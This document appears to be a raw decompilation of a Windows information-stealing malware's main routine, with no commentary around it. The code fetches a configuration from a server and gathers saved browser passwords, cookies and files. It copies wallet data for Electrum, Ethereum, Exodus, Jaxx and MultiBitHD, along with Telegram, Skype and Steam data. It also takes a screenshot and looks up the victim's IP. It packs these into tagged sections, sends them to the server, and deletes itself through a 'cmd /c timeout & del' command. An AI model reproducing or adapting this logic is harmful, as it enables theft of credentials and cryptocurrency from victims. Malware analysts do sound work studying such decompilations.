                            				char _v104;
                            				char* _v108;
                            				void* _v112;
                            				char _v241;
                            				intOrPtr _v276;
                            				intOrPtr _v280;
                            				intOrPtr _v284;
                            				intOrPtr _v288;
                            				intOrPtr _v292;
                            				intOrPtr _v296;
                            				intOrPtr _v300;
                            				char _v304;
                            				char _v308;
                            				char _v312;
                            				char _v316;
                            				char _v320;
                            				char _v324;
                            				char _v328;
                            				char _v332;
                            				char _v336;
                            				char _v340;
                            				char _v344;
                            				char _v348;
                            				char _v352;
                            				char _v356;
                            				char _v360;
                            				char _v364;
                            				char _v368;
                            				char _v372;
                            				char _v376;
                            				char _v380;
                            				char _v384;
                            				char _v388;
                            				char _v392;
                            				char _v396;
                            				char _v400;
                            				char _v404;
                            				char _v408;
                            				char _v412;
                            				char _v416;
                            				char _v420;
                            				char _v424;
                            				char _v428;
                            				char _v432;
                            				char _v436;
                            				char _v440;
                            				char _v444;
                            				char _v448;
                            				intOrPtr _v452;
                            				intOrPtr _v456;
                            				char _v460;
                            				char _v464;
                            				char _v468;
                            				char _v472;
                            				char _v476;
                            				char _v480;
                            				char _v484;
                            				char _v488;
                            				char _v492;
                            				char _v496;
                            				char _v500;
                            				char _v504;
                            				char _v508;
                            				char _v512;
                            				char _v516;
                            				char _v520;
                            				char _v524;
                            				char _v528;
                            				char _v532;
                            				char _v536;
                            				char _v540;
                            				char _v544;
                            				char _v548;
                            				char _v552;
                            				char _v556;
                            				char _v560;
                            				char _v564;
                            				char _v568;
                            				char _v572;
                            				char _v576;
                            				char _v580;
                            				char _v584;
                            				char _v588;
                            				char _v592;
                            				char _v596;
                            				char _v600;
                            				char _v604;
                            				char _v608;
                            				char _v612;
                            				intOrPtr _v616;
                            				char _v620;
                            				char _v624;
                            				char _v628;
                            				char _v632;
                            				char _v636;
                            				char _v640;
                            				char _v644;
                            				void* _t444;
                            				void* _t450;
                            				intOrPtr* _t451;
                            				intOrPtr* _t616;
                            				intOrPtr* _t623;
                            				intOrPtr* _t630;
                            				intOrPtr* _t637;
                            				intOrPtr* _t651;
                            				intOrPtr* _t652;
                            				intOrPtr* _t653;
                            				intOrPtr* _t656;
                            				intOrPtr* _t657;
                            				intOrPtr* _t660;
                            				intOrPtr* _t661;
                            				intOrPtr* _t664;
                            				intOrPtr* _t672;
                            				void* _t678;
                            				intOrPtr* _t715;
                            				intOrPtr* _t751;
                            				intOrPtr* _t752;
                            				intOrPtr _t757;
                            				signed int _t807;
                            				intOrPtr* _t828;
                            				intOrPtr* _t831;
                            				signed int _t838;
                            				signed int _t885;
                            				intOrPtr _t902;
                            				int _t921;
                            				void* _t934;
                            				void* _t936;
                            				void* _t938;
                            				intOrPtr* _t945;
                            				intOrPtr* _t948;
                            				intOrPtr* _t949;
                            				intOrPtr* _t950;
                            				signed int _t963;
                            				signed int _t964;
                            				void* _t965;
                            				void* _t989;
                            				intOrPtr _t997;
                            				intOrPtr _t1015;
                            				intOrPtr* _t1088;
                            				void* _t1109;
                            				intOrPtr* _t1111;
                            				intOrPtr* _t1113;
                            				intOrPtr* _t1115;
                            				char** _t1118;
                            				void* _t1125;
                            				void* _t1153;
                            				void* _t1155;
                            				void* _t1156;
                            				intOrPtr _t1160;
                            				intOrPtr _t1161;
                            				void* _t1164;
                            				void* _t1191;
                            				void* _t1197;
                            				void* _t1205;
                            				void* _t1207;
                            
                            				_t1207 = __fp0;
                            				_t1157 = __esi;
                            				_t1151 = __edi;
                            				_t962 = __ebx;
                            				_t1160 = _t1161;
                            				_t965 = 0x50;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t965 = _t965 - 1;
                            					_t1162 = _t965;
                            				} while (_t965 != 0);
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_v8 = __eax;
                            				E00403980(_v8);
                            				_push(_t1160);
                            				_push(0x41985e);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t1161;
                            				E004034E4( &_v76);
                            				_v86 = 0;
                            				_v85 = 0;
                            				E0040357C( &_v92, 0x41987c);
                            				E00405668();
                            				E00407DE0( &_v308, _t1162);
                            				_push( &_v308);
                            				E00406CE8( &_v312, __ebx, __esi); // executed
                            				_pop(_t444);
                            				E00403798(_t444, _v312);
                            				_t450 = CreateMutexA(0, 0, E00403990(_v308)); // executed
                            				_v112 = _t450;
                            				_t451 =  *0x41b12c; // 0x41c6a4
                            				if( *((intOrPtr*)( *_t451))() == 0xb7) {
                            					L71:
                            					_pop(_t997);
                            					 *[fs:eax] = _t997;
                            					_push(E00419868);
                            					E004034E4( &_v644);
                            					E00403BF4( &_v640, 2);
                            					E004034E4( &_v632);
                            					E00403BF4( &_v628, 5);
                            					E00403508( &_v608, 9);
                            					E00403BDC( &_v572);
                            					E00403508( &_v568, 2);
                            					E00403BDC( &_v560);
                            					E00403508( &_v556, 2);
                            					E00403BDC( &_v548);
                            					E00403508( &_v544, 2);
                            					E00403BDC( &_v536);
                            					E00403508( &_v532, 2);
                            					E00403BDC( &_v524);
                            					E00403508( &_v520, 2);
                            					E00403BDC( &_v512);
                            					E00403508( &_v508, 2);
                            					E00403BDC( &_v500);
                            					E00403508( &_v496, 2);
                            					E00403BDC( &_v488);
                            					E00403508( &_v484, 0xa);
                            					E00403BF4( &_v444, 2);
                            					E004034E4( &_v436);
                            					E00403BF4( &_v432, 3);
                            					E004034E4( &_v420);
                            					E00403BF4( &_v416, 2);
                            					E004034E4( &_v408);
                            					E00403BF4( &_v404, 8);
                            					E004034E4( &_v372);
                            					E00403BF4( &_v368, 4);
                            					E00403508( &_v352, 0xc);
                            					E004034E4( &_v68);
                            					_t1015 =  *0x405f50; // 0x405f54
                            					E00404280( &_v64, 5, _t1015);
                            					E00403508( &_v44, 8);
                            					E004034E4( &_v8);
                            					E00403508( &_v108, 5);
                            					return E00403508( &_v84, 3);
                            				}
                            				E0040357C( &_v16, 0x419888);
                            				E00416DD4( &_v16, __ebx, 0x80000, 0x419928, __edi, __esi);
                            				E004069A8(_v16, _t962,  &_v316, __edi, _t1157);
                            				E0040357C( &_v16, _v316);
                            				E00406CE8( &_v324, _t962, _t1157); // executed
                            				E00406834(_v324, _t962, 0x80000,  &_v320, _t1151, _t1157);
                            				E004037DC( &_v36, _v320, 0x419934);
                            				E00416DD4( &_v36, _t962, 0x80000, _v92, _t1151, _t1157);
                            				E00417D84(_v16, _t962, _v36, _t1151, _t1157,  &_v20); // executed
                            				E00416DD4( &_v20, _t962, 0x80000, _v92, _t1151, _t1157);
                            				_t1164 = E00403790(_v20) - 0x2710;
                            				if(_t1164 < 0) {
                            					goto L71;
                            				}
                            				E004038DC(_v20, 0x419940);
                            				if(_t1164 == 0) {
                            					goto L71;
                            				}
                            				E004074E8(0x419960, _t962, 0x419950, _v20, _t1157,  &_v328);
                            				E004069A8(_v328, _t962,  &_v40, _t1151, _t1157);
                            				E004074E8(0x41997c, _t962, 0x41996c, _v20, _t1157,  &_v332);
                            				E00406B08(_v332, _t962,  &_v44, _t1151, _t1157);
                            				E00407A18(0x419988,  &_v48, _v40, _t1164);
                            				_t977 = 0x419994;
                            				E004074E8(0x4199a4, _t962, 0x419994, _v20, _t1157,  &_v340);
                            				_t1035 =  &_v336;
                            				E004069A8(_v340, _t962,  &_v336, _t1151, _t1157);
                            				E00408180(_v336, _t1164);
                            				E00409668(_v44, _t962, _t1157, _t1164);
                            				E0040E630();
                            				_t1153 = E00404648(_v48) - 1;
                            				if(_t1153 < 0) {
                            					L51:
                            					_t238 =  &_v8; // 0x2b
                            					_push( *_t238);
                            					_push(0x419988);
                            					E0041698C( &_v460, _t962, _t1035, _t1153, _t1157);
                            					_push(_v460);
                            					E00403850();
                            					E0040E6D4(_v456, _t962, "System.txt", _t1153, _t1157);
                            					E00406CE8( &_v468, _t962, _t1157);
                            					E00406834(_v468, _t962, _t977,  &_v464, _t1153, _t1157);
                            					_push(_v464);
                            					_push(0x419ec0);
                            					E00407B08( &_v476, _t962, _t1153, _t1157);
                            					E00406834(_v476, _t962, _t977,  &_v472, _t1153, _t1157);
                            					_push(_v472);
                            					_push(0x419ec0);
                            					E00406BD8( &_v488);
                            					E0040377C( &_v484, _v488);
                            					E00406834(_v484, _t962, _t977,  &_v480, _t1153, _t1157);
                            					_push(_v480);
                            					_push(0x419ec0);
                            					E004066E4( &_v500, _t1192);
                            					E0040377C( &_v496, _v500);
                            					E00406834(_v496, _t962, _t977,  &_v492, _t1153, _t1157);
                            					_push(_v492);
                            					_push(0x419ec0);
                            					E00406634( &_v512);
                            					E0040377C( &_v508, _v512);
                            					E00406834(_v508, _t962, _t977,  &_v504, _t1153, _t1157);
                            					_push(_v504);
                            					_push(0x419ec0);
                            					E004065F0( &_v524);
                            					E0040377C( &_v520, _v524);
                            					E00406834(_v520, _t962, _t977,  &_v516, _t1153, _t1157);
                            					_push(_v516);
                            					_push(0x419ec0);
                            					_t616 =  *0x41b2a8; // 0x41b0b8
                            					E0040709C( *_t616, _t962,  &_v536, _t1157, _t1192);
                            					E0040377C( &_v532, _v536);
                            					E00406834(_v532, _t962, _t977,  &_v528, _t1153, _t1157);
                            					_push(_v528);
                            					_push(0x419ec0);
                            					_t623 =  *0x41b2c4; // 0x41b0b0
                            					E0040709C( *_t623, _t962,  &_v548, _t1157, _t1192);
                            					E0040377C( &_v544, _v548);
                            					E00406834(_v544, _t962, _t977,  &_v540, _t1153, _t1157);
                            					_push(_v540);
                            					_push(0x419ec0);
                            					_t630 =  *0x41b1cc; // 0x41b0b4
                            					E0040709C( *_t630, _t962,  &_v560, _t1157, _t1192);
                            					E0040377C( &_v556, _v560);
                            					E00406834(_v556, _t962, _t977,  &_v552, _t1153, _t1157);
                            					_push(_v552);
                            					_push(0x419ec0);
                            					_t637 =  *0x41b3f8; // 0x41b0ac
                            					E0040709C( *_t637, _t962,  &_v572, _t1157, _t1192);
                            					E0040377C( &_v568, _v572);
                            					E00406834(_v568, _t962, _t977,  &_v564, _t1153, _t1157);
                            					_push(_v564);
                            					_push(0x419ec0);
                            					E00406834(_v8, _t962, _t977,  &_v576, _t1153, _t1157);
                            					_push(_v576);
                            					_push(0x419ec0);
                            					E00407DE0( &_v584, _t1192);
                            					E00406834(_v584, _t962, _t977,  &_v580, _t1153, _t1157);
                            					_push(_v580);
                            					E00403850();
                            					_push("<info");
                            					_t651 =  *0x41b350; // 0x41b0bc
                            					_push( *_t651);
                            					_push(0x419edc);
                            					_push(_v28);
                            					_push("</info");
                            					_t652 =  *0x41b350; // 0x41b0bc
                            					_push( *_t652);
                            					_push(0x419edc);
                            					_push(0x419988);
                            					_push("<pwds");
                            					_t653 =  *0x41b350; // 0x41b0bc
                            					_push( *_t653);
                            					_push(0x419edc);
                            					E004063C8( &_v588, _t962, _t1153, _t1157);
                            					_push(_v588);
                            					_push("</pwds");
                            					_t656 =  *0x41b350; // 0x41b0bc
                            					_push( *_t656);
                            					_push(0x419edc);
                            					_push(0x419988);
                            					_push("<coks");
                            					_t657 =  *0x41b350; // 0x41b0bc
                            					_push( *_t657);
                            					_push(0x419edc);
                            					E00406560( &_v592, _t962, _t977, _t1153, _t1157);
                            					_push(_v592);
                            					_push("</coks");
                            					_t660 =  *0x41b350; // 0x41b0bc
                            					_push( *_t660);
                            					_push(0x419edc);
                            					_push(0x419988);
                            					_push("<file");
                            					_t661 =  *0x41b350; // 0x41b0bc
                            					_push( *_t661);
                            					_push(0x419edc);
                            					E0040E8D0( &_v596, _t962, _t1192);
                            					_push(_v596);
                            					_push("</file");
                            					_t664 =  *0x41b350; // 0x41b0bc
                            					_push( *_t664);
                            					_push(0x419edc);
                            					_push(0x419988);
                            					E00403850();
                            					_t1193 = _v85 - 1;
                            					if(_v85 == 1) {
                            						_push(_v24);
                            						_push("<ip");
                            						_t751 =  *0x41b350; // 0x41b0bc
                            						_push( *_t751);
                            						_push(0x419edc);
                            						_push(_v80);
                            						_push(0x419e90);
                            						_push(_v84);
                            						_push("</ip");
                            						_t752 =  *0x41b350; // 0x41b0bc
                            						_push( *_t752);
                            						_push(0x419edc);
                            						_push(0x419988);
                            						E00403850();
                            					}
                            					E00416DD4( &_v24, _t962, 0x80000, _v92, _t1153, _t1157);
                            					_t979 = 0;
                            					E00417D84(_v16, _t962, _v24, _t1153, _t1157,  &_v600);
                            					_t672 =  *0x41b3a0; // 0x41c6a0
                            					 *((intOrPtr*)( *_t672))(_v112);
                            					E00405114(0x419f74, _t962, _t1153, _t1157, _t1193);
                            					_t678 = E00403790(_v76);
                            					_t1194 = _t678 - 3;
                            					if(_t678 <= 3) {
                            						L65:
                            						E004099C0(_t962, _t1157);
                            						E00407DE0( &_v608, _t1205);
                            						E004038DC(_v608, 0x419fa4);
                            						if(_t1205 != 0) {
                            							L68:
                            							E004038DC(_v8, 0x419fb0);
                            							if(__eflags == 0) {
                            								__eflags = _v86 - 1;
                            								if(_v86 == 1) {
                            									E004028E0( &_v304, 0x3c);
                            									_v304 = 0x3c;
                            									_v300 = 0x1c0;
                            									_v296 = 0;
                            									_v292 = 0;
                            									E004062FC(L"%comspec%",  &_v612, __eflags);
                            									_v288 = E00403D98(_v612);
                            									E004062FC(L"/c %WINDIR%\\system32\\timeout.exe 3 & del \"",  &_v620, __eflags);
                            									E00402754(0,  &_v632);
                            									E00403D88( &_v628, _v632);
                            									E004077C8(_v628, _t962, 0,  &_v624, _t1157, __eflags);
                            									E00403E78();
                            									_v284 = E00403D98(_v616);
                            									E00402754(0,  &_v644);
                            									E00403D88( &_v640, _v644);
                            									E00407854(_v640, _t962, 0,  &_v636, _t1157, __eflags);
                            									_v280 = E00403D98(_v636);
                            									__eflags = 0;
                            									_v276 = 0;
                            									_t715 =  *0x41b150; // 0x41c764
                            									 *((intOrPtr*)( *_t715))( &_v304, E0041A02C, _v624, _v620);
                            									ExitProcess(0);
                            								}
                            							}
                            							goto L71;
                            						}
                            						E004038DC(_v8, 0x419fb0);
                            						if(_t1205 != 0) {
                            							goto L68;
                            						}
                            						E00407E90(_t962, _t979, _t1153, _t1157, _t1205);
                            						goto L71;
                            					} else {
                            						_t979 =  &_v56;
                            						E00407A18(0x419988,  &_v56, _v76, _t1194);
                            						_t1153 = E00404648(_v56) - 1;
                            						if(_t1153 < 0) {
                            							goto L65;
                            						}
                            						_t1155 = _t1153 + 1;
                            						_t963 = 0;
                            						do {
                            							_push(0);
                            							E00404804();
                            							_t1161 = _t1161 + 4;
                            							_t979 =  &_v60;
                            							E00407A18(0x419db4,  &_v60,  *((intOrPtr*)(_v56 + _t963 * 4)), 0);
                            							_t1197 = E00404648(_v60) - 4;
                            							if(_t1197 != 0) {
                            								goto L64;
                            							}
                            							E004038DC( *_v60, 0x419f80);
                            							if(_t1197 != 0) {
                            								goto L64;
                            							}
                            							_t979 =  &_v64;
                            							E00407A18(0x419f8c,  &_v64,  *((intOrPtr*)(_v60 + 0xc)), _t1197);
                            							_v87 = 0;
                            							_t1157 = E00404648(_v64) - 1;
                            							if(_t1157 < 0) {
                            								L62:
                            								_t1203 = _v87 - 1;
                            								if(_v87 == 1) {
                            									E004038DC( *((intOrPtr*)(_v60 + 8)), 0x419f98);
                            									E0041841C( *((intOrPtr*)(_v60 + 4)), _t963, 0x419f00 | _t1203 == 0x00000000, _t1155, _t1157);
                            								}
                            								goto L64;
                            							}
                            							_t1157 = _t1157 + 1;
                            							_v72 = 0;
                            							while(1) {
                            								E0040633C( *((intOrPtr*)(_v64 + _v72 * 4)), _t963,  &_v604, _t1155, _t1157);
                            								_t1088 =  *0x41b154; // 0x41c66c
                            								_v87 = E00403AD4(_v604,  *_t1088) != 0;
                            								if(_v87 == 1) {
                            									goto L62;
                            								}
                            								_v72 = _v72 + 1;
                            								_t1157 = _t1157 - 1;
                            								if(_t1157 != 0) {
                            									continue;
                            								}
                            								goto L62;
                            							}
                            							goto L62;
                            							L64:
                            							_t963 = _t963 + 1;
                            							_t1155 = _t1155 - 1;
                            							_t1205 = _t1155;
                            						} while (_t1205 != 0);
                            						goto L65;
                            					}
                            				} else {
                            					_t1156 = _t1153 + 1;
                            					_t964 = 0;
                            					do {
                            						if(E00403790( *((intOrPtr*)(_v48 + _t964 * 4))) < 5) {
                            							goto L50;
                            						}
                            						if(_t964 != 0) {
                            							L34:
                            							_t757 = _v48;
                            							_t1186 =  *((char*)( *((intOrPtr*)(_t757 + _t964 * 4)))) - 0x46;
                            							if( *((char*)( *((intOrPtr*)(_t757 + _t964 * 4)))) != 0x46) {
                            								L44:
                            								if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)))) == 0x4c) {
                            									_push(_v76);
                            									_push( *((intOrPtr*)(_v48 + _t964 * 4)));
                            									_push(0x419988);
                            									_t1035 = 3;
                            									E00403850();
                            								}
                            								_t1191 =  *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)))) - 0x49;
                            								if(_t1191 == 0) {
                            									_t977 =  &_v52;
                            									E00407A18(0x419db4,  &_v52,  *((intOrPtr*)(_v48 + _t964 * 4)), _t1191);
                            									E004038DC( *((intOrPtr*)(_v52 + 4)), 0x419e20);
                            									if(_t1191 != 0) {
                            										_t1035 = "ip.txt";
                            										E0040E6D4( *((intOrPtr*)(_v52 + 4)), _t964, "ip.txt", _t1156, _t1157);
                            									} else {
                            										_v85 = 1;
                            										E00417D84("http://ip-api.com/json", _t964, 0, _t1156, _t1157,  &_v32);
                            										E004074E8("\"query\":\"", _t964, 0x419e58, _v32, _t1157,  &_v80);
                            										_t977 = 0x419e58;
                            										E004074E8("\"countryCode\":\"", _t964, 0x419e58, _v32, _t1157,  &_v84);
                            										_push(_v80);
                            										_push(0x419e90);
                            										_push(_v84);
                            										E00403850();
                            										_t1035 = "ip.txt";
                            										E0040E6D4(_v452, _t964, "ip.txt", _t1156, _t1157);
                            									}
                            								}
                            								goto L50;
                            							}
                            							E00407A18(0x419db4,  &_v52,  *((intOrPtr*)(_v48 + _t964 * 4)), _t1186);
                            							E0040357C( &_v96,  *((intOrPtr*)(_v52 + 8)));
                            							if(E00403AD4(0x419dc0, _v96) != 1) {
                            								E00403D88( &_v424,  *((intOrPtr*)(_v52 + 0x1c)));
                            								_push(_v424);
                            								E00403D88( &_v428,  *((intOrPtr*)(_v52 + 0x10)));
                            								_push(E00407108(_v428, _t964,  &_v52, __eflags));
                            								_push(E004038DC( *((intOrPtr*)(_v52 + 0x14)), 0x419e04) & 0xffffff00 | __eflags == 0x00000000);
                            								_t807 = E004038DC( *((intOrPtr*)(_v52 + 0x18)), 0x419e04);
                            								_t192 = __eflags == 0;
                            								__eflags = _t192;
                            								_push(_t807 & 0xffffff00 | _t192);
                            								_push(1);
                            								_push("Files\\");
                            								_push( *((intOrPtr*)(_v52 + 4)));
                            								_push(0x419de8);
                            								E00403850();
                            								E00403D88( &_v432, _v436);
                            								_push(_v432);
                            								E00403D88( &_v440,  *((intOrPtr*)(_v52 + 0xc)));
                            								_push(_v440);
                            								E004037DC( &_v448, 0x419de8,  *((intOrPtr*)(_v52 + 8)));
                            								E00403D88( &_v444, _v448);
                            								_pop(_t1035);
                            								_pop(_t977);
                            								E00413F58(_v444, _t964, _t977, _t1035, _t1156, _t1157);
                            								goto L44;
                            							}
                            							_t977 = 0x419dd0;
                            							_t1035 = _v96;
                            							E004074E8(0x419dc0, _t964, 0x419dd0, _v96, _t1157,  &_v108);
                            							_push( &_v241);
                            							_push(0x81);
                            							_t828 =  *0x41b240; // 0x41c6f8
                            							if( *((intOrPtr*)( *_t828))() == 0) {
                            								goto L71;
                            							}
                            							_t1157 =  &_v241;
                            							while( *_t1157 != 0) {
                            								_t831 =  *0x41b114; // 0x41c6fc
                            								E0040709C( *((intOrPtr*)( *_t831))(_t1157), _t964,  &_v356, _t1157, __eflags);
                            								E0040377C( &_v352, _v356);
                            								_t1035 = _v108;
                            								_t838 = E00403AD4(_v352, _v108);
                            								__eflags = _t838;
                            								if(_t838 != 0) {
                            									_push( &_v360);
                            									E00403CF4( &_v364, _t1157);
                            									_push(_v364);
                            									_push("%DSK_");
                            									_push(_v108);
                            									E00403850();
                            									E00403D88( &_v368, _v372);
                            									_push(_v368);
                            									E00403D88( &_v376, _v96);
                            									_pop(_t1125);
                            									_t989 = 0x419ddc;
                            									E0040717C(_v376, _t964, _t989, _t1125);
                            									E0040377C( &_v104, _v360);
                            									E004034E4( &_v100);
                            									_push( *((intOrPtr*)(_v52 + 4)));
                            									_push(0x419de8);
                            									_push(_v104);
                            									E00403850();
                            									E00403D88( &_v384, _v100);
                            									E0040717C(_v384, _t964, 0, 0x419df0,  &_v380);
                            									E00403DB4( &_v380, 0, 0x419df8, __eflags);
                            									E0040377C( &_v100, _v380);
                            									E00403D88( &_v392, _v100);
                            									E004078D8(_v392, _t964,  &_v388, __eflags);
                            									E0040377C( &_v100, _v388);
                            									E00403D88( &_v396,  *((intOrPtr*)(_v52 + 0x1c)));
                            									_push(_v396);
                            									E00403D88( &_v400,  *((intOrPtr*)(_v52 + 0x10)));
                            									_push(E00407108(_v400, _t964, 0, __eflags));
                            									_push(E004038DC( *((intOrPtr*)(_v52 + 0x14)), 0x419e04) & 0xffffff00 | __eflags == 0x00000000);
                            									_t885 = E004038DC( *((intOrPtr*)(_v52 + 0x18)), 0x419e04);
                            									_t162 = __eflags == 0;
                            									__eflags = _t162;
                            									_push(_t885 & 0xffffff00 | _t162);
                            									_push(1);
                            									E004037DC( &_v408, _v100, "Files\\");
                            									E00403D88( &_v404, _v408);
                            									_push(_v404);
                            									E00403D88( &_v412,  *((intOrPtr*)(_v52 + 0xc)));
                            									_push(_v412);
                            									E004037DC( &_v420, 0x419de8, _v104);
                            									E00403D88( &_v416, _v420);
                            									_pop(_t1035);
                            									_pop(_t977);
                            									E00413F58(_v416, _t964, _t977, _t1035, _t1156, _t1157);
                            								}
                            								_t1157 = _t1157 + 4;
                            								__eflags = _t1157;
                            							}
                            							goto L44;
                            						} else {
                            							_t902 =  *((intOrPtr*)(_v48 + _t964 * 4));
                            							_t1169 =  *((char*)(_t902 + 1)) - 0x2b;
                            							if( *((char*)(_t902 + 1)) == 0x2b) {
                            								E0040E1DC(_t964, _t1035, _t1156, _t1157, _t1169, _t1207);
                            								E00405424( &_v344);
                            								_t1035 = "PasswordsList.txt";
                            								E0040E6D4(_v344, _t964, "PasswordsList.txt", _t1156, _t1157);
                            							}
                            							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 2)) == 0x2b) {
                            								E00413BB4();
                            								E00405574( &_v348);
                            								_t1118 =  *0x41b2fc; // 0x41ca18
                            								_t1035 =  *_t1118;
                            								E0040E6D4(_v348, _t964,  *_t1118, _t1156, _t1157);
                            							}
                            							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 9)) == 0x2b) {
                            								E00413BE8();
                            							}
                            							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 3)) == 0x2b) {
                            								E00414DE8(L"Coins", _t964, _t1156, _t1157);
                            								_t934 = E00413F58(L"%appdata%\\Electrum\\wallets\\", _t964, L"Coins\\Electrum", 0x4199fc, _t1156, _t1157, 0, 0, 1, 0x7d0, 0);
                            								_t1111 =  *0x41b2c4; // 0x41b0b0
                            								 *_t1111 =  *_t1111 + _t934;
                            								_t936 = E00413F58(L"%appdata%\\Electrum-LTC\\wallets\\", _t964, L"Coins\\Electrum-LTC", 0x4199fc, _t1156, _t1157, 0, 0, 1, 0x7d0, 0);
                            								_t1113 =  *0x41b2c4; // 0x41b0b0
                            								 *_t1113 =  *_t1113 + _t936;
                            								_t938 = E00413F58(L"%APPDATA%\\Ethereum\\keystore\\", _t964, L"Coins\\Ethereum", L"UTC*", _t1156, _t1157, 0, 0, 1, 0x1388, 0);
                            								_t1115 =  *0x41b2c4; // 0x41b0b0
                            								 *_t1115 =  *_t1115 + _t938;
                            								if(E00413F58(L"%APPDATA%\\Exodus\\", _t964, L"Coins\\Exodus", L"*.json,*.seco", _t1156, _t1157, 0, 0, 1, 0x1388, 0) > 0) {
                            									_t950 =  *0x41b2c4; // 0x41b0b0
                            									 *_t950 =  *_t950 + 1;
                            								}
                            								if(E00413F58(L"%APPDATA%\\Jaxx\\Local Storage\\", _t964, L"Coins\\Jaxx\\Local Storage\\", 0x4199fc, _t1156, _t1157, 0, 0, 1, 0x1388, 0) > 0) {
                            									_t949 =  *0x41b2c4; // 0x41b0b0
                            									 *_t949 =  *_t949 + 1;
                            								}
                            								_t977 = L"Coins\\MultiBitHD";
                            								_t1035 = L"mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml";
                            								if(E00413F58(L"%APPDATA%\\MultiBitHD\\", _t964, L"Coins\\MultiBitHD", L"mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml", _t1156, _t1157, 0, 0, 1, 0x1388, 0) > 0) {
                            									_t948 =  *0x41b2c4; // 0x41b0b0
                            									 *_t948 =  *_t948 + 1;
                            								}
                            								_t945 =  *0x41b2c4; // 0x41b0b0
                            								_t1179 =  *_t945;
                            								if( *_t945 > 0) {
                            									E00405114(0x419cd8, _t964, _t1156, _t1157, _t1179);
                            								}
                            							}
                            							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 4)) == 0x2b) {
                            								E00414808(L"Skype", _t964, _t1156, _t1157);
                            							}
                            							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 5)) == 0x2b) {
                            								_t977 = L"Telegram";
                            								_t1035 = L"D877F783D5*,map*";
                            								E00413F58(L"%appdata%\\Telegram Desktop\\tdata\\", _t964, L"Telegram", L"D877F783D5*,map*", _t1156, _t1157, 0, 0, 1, 0x3e8, 0);
                            							}
                            							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 6)) == 0x2b) {
                            								E00414A90(L"Steam", _t964, _t1156, _t1157);
                            							}
                            							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 7)) == 0x2b) {
                            								_push(0);
                            								_push(0x32);
                            								_push(L"image/jpeg");
                            								_push( &_v68);
                            								_push(GetSystemMetrics(1));
                            								_t921 = GetSystemMetrics(0);
                            								_t977 = 0;
                            								_pop(_t1109);
                            								E00416FB0(_t921, _t964, 0, _t1109, _t1156, _t1157);
                            								_t1035 = "scr.jpg";
                            								E0040E6D4(_v68, _t964, "scr.jpg", _t1156, _t1157);
                            							}
                            							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 8)) == 0x2b) {
                            								_v86 = 1;
                            							}
                            							goto L34;
                            						}
                            						L50:
                            						_t964 = _t964 + 1;
                            						_t1156 = _t1156 - 1;
                            						_t1192 = _t1156;
                            					} while (_t1156 != 0);
                            					goto L51;
                            				}
                            			}
                            0x00419382
                            0x00419382
                            0x00419392
                            0x0041939e
                            0x004193a6
                            0x004193af
                            0x004193b6
                            0x004193bd
                            0x004193c5
                            0x004193ca
                            0x004193cd
                            0x004194dd
                            0x004194dd
                            0x004194e8
                            0x004194f8
                            0x004194fd
                            0x00419518
                            0x00419520
                            0x00419525
                            0x0041952b
                            0x0041952f
                            0x00419542
                            0x00419547
                            0x00419551
                            0x0041955d
                            0x00419565
                            0x00419576
                            0x00419586
                            0x00419597
                            0x004195aa
                            0x004195bb
                            0x004195cc
                            0x004195e7
                            0x004195f7
                            0x00419605
                            0x00419616
                            0x00419627
                            0x00419637
                            0x0041963d
                            0x0041963f
                            0x0041964c
                            0x00419653
                            0x00419657
                            0x00419657
                            0x0041952f
                            0x00000000
                            0x00419525
                            0x00419507
                            0x0041950c
                            0x00000000
                            0x00000000
                            0x0041950e
                            0x00000000
                            0x004193d3
                            0x004193d3
                            0x004193de
                            0x004193ed
                            0x004193f0
                            0x00000000
                            0x00000000
                            0x004193f6
                            0x004193f7
                            0x004193f9
                            0x004193f9
                            0x00419409
                            0x0041940e
                            0x00419411
                            0x0041941f
                            0x0041942c
                            0x0041942f
                            0x00000000
                            0x00000000
                            0x0041943f
                            0x00419444
                            0x00000000
                            0x00000000
                            0x0041944a
                            0x00419458
                            0x0041945d
                            0x0041946b
                            0x0041946e
                            0x004194b1
                            0x004194b1
                            0x004194b5
                            0x004194c2
                            0x004194d0
                            0x004194d0
                            0x00000000
                            0x004194b5
                            0x00419470
                            0x00419471
                            0x00419478
                            0x00419487
                            0x00419492
                            0x004194a1
                            0x004194a9
                            0x00000000
                            0x00000000
                            0x004194ab
                            0x004194ae
                            0x004194af
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004194af
                            0x00000000
                            0x004194d5
                            0x004194d5
                            0x004194d6
                            0x004194d6
                            0x004194d6
                            0x00000000
                            0x004193f9
                            0x004188e0
                            0x004188e0
                            0x004188e1
                            0x004188e3
                            0x004188f1
                            0x00000000
                            0x00000000
                            0x004188f9
                            0x00418b3e
                            0x00418b3e
                            0x00418b44
                            0x00418b47
                            0x00418ed1
                            0x00418eda
                            0x00418edc
                            0x00418ee2
                            0x00418ee5
                            0x00418eed
                            0x00418ef2
                            0x00418ef2
                            0x00418efd
                            0x00418f00
                            0x00418f06
                            0x00418f14
                            0x00418f24
                            0x00418f29
                            0x00418fa3
                            0x00418fa8
                            0x00418f2b
                            0x00418f2b
                            0x00418f3f
                            0x00418f55
                            0x00418f5e
                            0x00418f6b
                            0x00418f70
                            0x00418f73
                            0x00418f78
                            0x00418f86
                            0x00418f91
                            0x00418f96
                            0x00418f96
                            0x00418f29
                            0x00000000
                            0x00418f00
                            0x00418b5b
                            0x00418b69
                            0x00418b7c
                            0x00418dfa
                            0x00418e05
                            0x00418e12
                            0x00418e22
                            0x00418e36
                            0x00418e42
                            0x00418e47
                            0x00418e47
                            0x00418e4a
                            0x00418e4b
                            0x00418e4d
                            0x00418e55
                            0x00418e58
                            0x00418e68
                            0x00418e79
                            0x00418e84
                            0x00418e91
